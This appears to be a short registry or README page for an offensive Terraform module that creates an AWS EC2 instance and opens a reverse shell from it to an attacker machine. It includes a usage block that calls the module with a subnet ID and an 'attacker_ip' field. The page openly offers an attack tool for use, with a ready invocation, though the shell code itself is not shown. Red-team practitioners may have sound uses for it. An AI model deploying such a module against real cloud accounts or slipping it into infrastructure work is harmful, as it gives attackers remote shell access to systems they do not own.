terraform-aws-ec2-instance-reverse-shell
terraform-aws-ec2-instance-reverse-shell copied to clipboard
Offensive Terraform module which creates EC2 instance and reverse shell from an EC2 instance to attacker machine.
AWS EC2 Instance Reverse Shell Module
Offensive Terraform module which creates EC2 instance and reverse shell from an EC2 instance to attacker machine.

Usage
module "ec2-instance-reverse-shell" {
source = "offensive-terraform/ec2-instance-reverse-shell/aws"
subnet_id = "subnet-0a4a1cc04"
attacker_ip = "0.0.0.0"
}
Author
Module managed by https://github.com/iganbold